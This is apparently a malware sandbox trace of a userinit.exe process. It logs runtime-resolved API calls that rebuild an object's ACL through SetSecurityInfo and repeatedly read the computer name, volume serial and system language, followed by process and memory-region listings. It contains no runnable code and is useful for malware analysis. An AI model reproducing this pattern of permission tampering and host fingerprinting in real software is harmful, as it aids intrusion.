[0130.281] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293ff60, pSourceSid=0x280f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x293ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.281] IsValidSid (pSid=0x293ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.281] ConvertSidToStringSidA () returned 0x1
[0130.281] LocalFree (hMem=0x287018) returned 0x0
[0130.281] GetAce (in: pAcl=0x280f3c, dwAceIndex=0x2, pAce=0x6e914 | out: pAce=0x6e914*=0x280f70) returned 1
[0130.281] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29329c0, pSourceSid=0x280f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x29329c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0130.281] IsValidSid (pSid=0x29329c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0130.281] ConvertSidToStringSidA () returned 0x1
[0130.281] LocalFree (hMem=0x287018) returned 0x0
[0130.281] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.282] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0130.282] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x280f28, lpbSaclPresent=0x6ea84, pSacl=0x6ea78, lpbSaclDefaulted=0x6ea7c | out: lpbSaclPresent=0x6ea84, pSacl=0x6ea78, lpbSaclDefaulted=0x6ea7c) returned 1
[0130.282] LocalFree (hMem=0x280f28) returned 0x0
[0130.282] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.282] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.282] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0130.282] GetLengthSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0130.282] GetLastError () returned 0x0
[0130.282] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.282] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0130.282] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.282] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0130.282] InitializeAcl (in: pAcl=0x287fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x287fa8) returned 1
[0130.282] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.282] GetLengthSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0130.282] GetLastError () returned 0x0
[0130.282] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.283] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.283] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0130.283] SetLastError (dwErrCode=0x0)
[0130.283] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.283] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0130.283] GetSidSubAuthorityCount (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x293f615
[0130.283] GetLastError () returned 0x0
[0130.283] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.283] SetLastError (dwErrCode=0x0)
[0130.283] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.283] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0130.283] GetSidIdentifierAuthority (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x293f616
[0130.283] GetLastError () returned 0x0
[0130.283] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.283] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.283] SetLastError (dwErrCode=0x0)
[0130.283] GetSidSubAuthorityCount (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x293f615
[0130.283] GetLastError () returned 0x0
[0130.283] SetLastError (dwErrCode=0x0)
[0130.283] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.284] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0130.284] GetSidSubAuthority (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x293f61c
[0130.284] GetLastError () returned 0x0
[0130.284] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.284] GetLengthSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0130.284] GetLastError () returned 0x0
[0130.284] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.284] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0130.284] AddAce (in: pAcl=0x287fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x272f90, nAceListLength=0x14 | out: pAcl=0x287fa8) returned 1
[0130.284] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.284] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0130.284] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.284] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0130.285] SetSecurityInfo () returned 0x0
[0130.285] CloseHandle (hObject=0x1d0) returned 1
[0130.285] GetComputerNameA (in: lpBuffer=0x293fd84, nSize=0x6ed4c | out: lpBuffer="CRH2YWU7", nSize=0x6ed4c) returned 1
[0130.285] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.285] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.285] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec40, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.285] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.286] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec40, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.286] VirtualAlloc (lpAddress=0x2940000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2940000
[0130.286] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.286] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.286] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.286] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.286] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.287] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.287] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.287] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.287] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.287] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.287] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.287] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.287] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.288] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.288] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.288] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.288] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6ed34, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x6ed48, lpMaximumComponentLength=0x6ed44, lpFileSystemFlags=0x6ed40, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6ed48*=0x90c08a66, lpMaximumComponentLength=0x6ed44*=0xff, lpFileSystemFlags=0x6ed40*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.288] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ec38, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.288] GetSystemDefaultLangID () returned 0x260409
[0130.288] VerLanguageNameA (in: wLang=0x409, szLang=0x6ecec, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0130.289] ExitProcess (uExitCode=0x0)
Thread:
id = 259
os_tid = 0x818
Thread:
id = 260
os_tid = 0x814
Process:
id = "37"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be7a0"
os_pid = "0x824"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3945
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3946
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3947
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3948
start_va = 0x50000
end_va = 0x8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 3949
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 3950
start_va = 0x6d0000
end_va = 0x6d8fff
entry_point = 0x6d0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 3951
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3952
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3953
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 3954
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 3955
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 3956
start_va = 0xb0000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 3957
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3958
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3959
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3960
start_va = 0x1b0000
end_va = 0x216fff
entry_point = 0x1b0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3961
start_va = 0x370000
end_va = 0x37ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 3962
start_va = 0x6cc60000
end_va = 0x6cce3fff
entry_point = 0x6cc60000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3963
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3964
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3965
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3966
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3967
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3968
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3969
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3970
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3971
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3972
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3973
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3974
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 3975
start_va = 0x220000
end_va = 0x2e7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000220000"
filename = ""
Region:
id = 3976
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3977
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3988
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 3989
start_va = 0x90000
end_va = 0x90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 3990
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3991
start_va = 0x6e0000
end_va = 0x12dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 3992
start_va = 0x1470000
end_va = 0x147ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 3993
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 3994
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 3995
start_va = 0x2f0000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 3999
start_va = 0x12e0000
end_va = 0x13befff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012e0000"
filename = ""
Region:
id = 4000
start_va = 0xa0000
end_va = 0xa0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 4001
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4002
start_va = 0x1480000
end_va = 0x153ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 4003
start_va = 0x1540000
end_va = 0x1e6ffff
entry_point = 0x1540000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 4004
start_va = 0x2f0000
end_va = 0x2f6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 4005
start_va = 0x300000
end_va = 0x301fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 4006
start_va = 0x320000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 4007
start_va = 0x1e70000
end_va = 0x2262fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e70000"
filename = ""
Region:
id = 4008
start_va = 0x380000
end_va = 0x3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 4009
start_va = 0x2270000
end_va = 0x237cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002270000"
filename = ""
Region:
id = 4016
start_va = 0x2380000
end_va = 0x247ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002380000"
filename = ""
Region:
id = 4020
start_va = 0x2480000
end_va = 0x267ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 4021
start_va = 0x13c0000
end_va = 0x1440fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 4025
start_va = 0x2680000
end_va = 0x2702fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 4026
start_va = 0x13c0000
end_va = 0x1444fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
